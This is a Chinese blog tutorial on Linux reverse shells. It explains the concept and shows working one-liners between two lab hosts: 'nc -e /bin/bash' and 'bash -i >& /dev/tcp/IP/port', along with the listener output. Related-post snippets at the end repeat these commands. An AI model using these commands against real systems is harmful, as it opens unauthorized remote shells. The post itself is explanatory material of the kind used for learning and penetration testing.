Linux 反弹 Shell

已于 2023-01-12 10:24:18 修改
阅读量543 收藏
点赞数
分类专栏: Linux 文章标签: linux 服务器 运维
于 2023-01-12 10:16:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46373211/article/details/128654498
版权

Linux 反弹 Shell

什么是 Shell

Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制

什么是反弹 Shell

其英文名叫做 Reverse Shell,就是控制端首先监听某个 TCP/UDP 端口,然后被控制端向这个端口发起一个请求,同时将自己命令行的输入输出转移到控制端,从而控制端就可以输入命令来控制被控端了

比如说,我们有两台主机 A、B,我们最终想实现在 A 上控制 B。那么如果用正向 Shell,其实就是在 A 上输入 B 的连接地址,比如通过 ssh 连接到 B,连接成功之后,我们就可以在 A 上通过命令控制 B 了。如果用反向 Shell,那就是在 A 上先开启一个监听端口,然后让 B 去连接 A 的这个端口,连接成功之后,A 这边就能通过命令控制 B 了

反弹 Shell 的作用

当我们使用 A 控制 B,但由于被控端因防火墙受限、权限不足、端口被占用等无法直接连接。这时我们就要使用反弹 Shell 让 B 向 A 主动发起连接,我们就可以使用 A 来控制 B 了

使用方法

控制端被控制端
IP:192.168.4.151IP:192.168.4.142
hostname:root@localhosthostname:root@dev_03

  1. 控制端和被控制端都安装 nc 命令

    yum -y install nc

  2. 监听端口。在控制端上执行 nc -lvvp 9999 命令

    [root@localhost ~]# nc -lvvp 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )    # 输出结果
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
    • -l:监听模式,用于入站连接
    • -vv:-vv 比-v 更详细的输出
    • -p:设置本地端口

  3. 发起连接请求。在被控制端上执行 nc -e /bin/bash [控制端的 IP] 9999 命令

    root@dev_03:~# nc -e /bin/bash 192.168.4.151 9999
    • -e:绑定命令行

    如果没有 -e 这个参数,是因为 nc 老版本没有这个选项的。需要安装 netcat-traditional 这个包,并执行 update-alternatives --config nc 这个命令,选择 /bin/nc.traditional 的编号,这里选择编号 2 即可

  4. 控制端接收连接请求。被控制端发起连接请求后,查看控制端

    [root@localhost ~]# nc -lvvp 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.4.142.
Ncat: Connection from 192.168.4.142:39064.

  5. 测试。控制端进行测试

    [root@localhost ~]# nc -lvvp 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.4.142.
Ncat: Connection from 192.168.4.142:39064.

uname -a
Linux dev_03 4.15.0-193-generic #204-Ubuntu SMP Fri Aug 26 19:20:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

ifconfig ens33
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.4.142  netmask 255.255.255.0  broadcast 192.168.4.255
        inet6 fe80::20c:29ff:fe14:1e21  prefixlen 64  scopeid 0x20<link>

被控制端使用 bash 发起连接

被控制端也可以不用安装 nc 这个命令发起连接,可以直接使用 bash 来实现

  1. 监听端口。在控制端上执行 nc -lvvp 9999 命令

    [root@localhost ~]# nc -lvvp 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )    # 输出结果
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999

  2. 发起连接请求。在被控制端上执行 bash -i >& /dev/tcp/[控制端的 IP]/9999 0>&1 命令

    root@dev_03:~# bash -i >& /dev/tcp/192.168.4.151/9999 0>&1
    • bash -i:就是产生一个 bash 交互环境
    • >&:可以将 bash 交互环境的输入、输出、错误输出都输出到一个地方
    • /dev/tcp/[控制端的 IP]/9999:指的是目标主机的一个连接地址,因为 Linux 环境中所有内容的定义都是以文件的形式存在的,指定这个地址就是让主机和目标主机建立一个 TCP 连接
    • 0>&1:可以将标准输入和标准输出相结合,重定向给前面标准输出的内容

    通过这样的命令,我们就可以就是将被控制端的标准输出和错误输出都重定向给控制端,并且将控制端的输入都重定向给被控制端,这样我们就可以实现控制端对被控制端的远程控制了

  3. 控制端接收连接请求。被控制端发起连接请求后,查看控制端,会显示被控制端的 localhost

    [root@localhost ~]# nc -lvvp 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.4.142.
Ncat: Connection from 192.168.4.142:34944.
root@dev_03:~#

  4. 测试。控制端进行测试

    [root@localhost ~]# nc -lvvp 9999
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.4.142.
Ncat: Connection from 192.168.4.142:34944.
root@dev_03:~#

root@dev_03:~# uname -a
uname -a
Linux dev_03 4.15.0-193-generic #204-Ubuntu SMP Fri Aug 26 19:20:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
root@dev_03:~#

root@dev_03:~# ifconfig ens33
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.4.142  netmask 255.255.255.0  broadcast 192.168.4.255
        inet6 fe80::20c:29ff:fe14:1e21  prefixlen 64  scopeid 0x20<link>
root@dev_03:~#
sankgao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
Linux反弹shell
weixin_64338385的博客
11-26 2261
0x01. bash 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port //port 为攻击主机端口 在目标主机上执行: bash -i >& /dev/tcp/攻击主机i...
LINUX shell反弹篇(一)
胖虎的博客
10-26 2051
linuxshell反弹的方法及原理
【安全知识】——LInuxshell反弹姿势合集(更新中)
Demo不是emo的博客
05-17 5602
当我们拿到一台LINUX主机的权限时,往往都需要反弹到公网的服务器上,一般我们使用bash来反弹的情况居多,但是bash也有失灵的时候。在这种情况下,我们可以尝试使用其他的反弹语句来达到我们的目的。
反弹shell
soldi_er的博客
04-16 3119
文章目录反向连接的概念反向连接命令命令分析Linux符号知识本地测试实战记录参考 反向连接的概念   反弹shell,是指目标向服务器端口发起请求,发送目标shell命令行的输入输出,服务器通过监听端口来获得请求内容。reverse shell与telnet、ssh等标准shell对应,本质上是网络概念的客户端/服务端的角色反转。   为什么不正向连接?通常用于连接目标机器防火墙受限、权限不足、端口被占用等情形。正向连接,包括远程桌面、Web服务、ssh、Telnet等。 反向连接命令 命令分析   示例
Linux反弹shell
yy
04-21 4088
在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。
linux反弹shell方法
weixin_53747497的博客
07-12 1688
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
Linux常用的反弹shell命令
m0_63200360的博客
04-24 2219
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么要反弹shell?通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。
带你了解LINUX反弹Shell的各种姿势(超详细)
xf555er的博客
11-27 1596
LInux反弹Shell(Reveser Shell), 也可以称为反向Shell, 由被控制端主动向控制端发送请求建立通讯, 随后将执行命令的结果输出到控制端, 本质上是网络概念的客户端与服务端的角色反转本篇文章介绍LINUX反弹Shell的多种姿势, 在真实的渗透环境中, 根据客户端存在哪些命令的实际情况, 来采取相应的反弹shell姿势。
渗透测试-Linux反弹shell
lza20001103的博客
05-11 2898
Linux反弹shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
浅析Linux之bash反弹shell原理
01-08
反弹shell往往是在攻击者无法直接连接受害者的情况下进行的操作,原因有很多,例如目标是局域网,或者开启防火墙的某些策略等情况,而这时,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口...
Linux』 第一章 基本操作指令(上)
m0_54443558的博客
04-28 908
Linux 基本指令
linux-journal日志文件特别大怎么办,journal日志文件学习
你是我的天晴
04-28 232
今天发现磁盘容量不多了,就去清理磁盘,发现这个文件特别大:journal,特此来学习下。
Linux:浏览器访问网站的基本流程(优先级从先到后)
fox_kang的博客
04-28 699
浏览器访问网站的基本流程(优先级从先到后) 首先查找浏览器是否存在该网站的访问缓存 其次查找本机的域名解析服务器 windows:C:\Windows\System32\drivers\etc\hosts Linux:/etc/hosts 使用外部的域名解析服务器解析(例如:114.114.114.114) 第一步:浏览器使用域名访问www.bilibili.com.网站 第二步:首先去访问根域名解析服务器查询,根服务器返回.com域名解析服务器地址==(这里的根域名解析服务器不会直接给出域名对应的
Linux】开始认识软硬链接
JLX_1的博客
04-29 2777
本文通过对文件系统的总结,讲解了Linux中的软硬链接
linux 信号
l2894的博客
04-27 809
设定闹钟是再OS内部,OS内可能有很多进程使用闹钟,所以OS要管理所有的闹钟,先描述,再组织,所以内核中一定要有描述闹钟属性的结构体,并用特定的数据结构组织起来,这里可以使用小根堆来对闹钟进行管理。),并保存在指定寄存器中,当中断发生时,CPU会暂停当前正在执行的程序,并保存当前进程的上下文数据,然后查找中断向量表,找到与中断号对应的处理函数的地址,回调方法。同时CPU有很多针脚,和外设物理连接,每个针脚有自己的编号,键盘按下按键会给特定的针脚发送高电平,触发硬件中断,CPU会识别到针脚的编号(
Linux 根据提交记录生成补丁及新旧文件对比
最新发布
feibafeibafeiba的博客
04-30 303
根据两个提交记录CMD1和CMD2生成差异文件list.diff,并根据CMD1的修改文件列表复制修改前的文件到old目录,修改后的文件到new目录

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值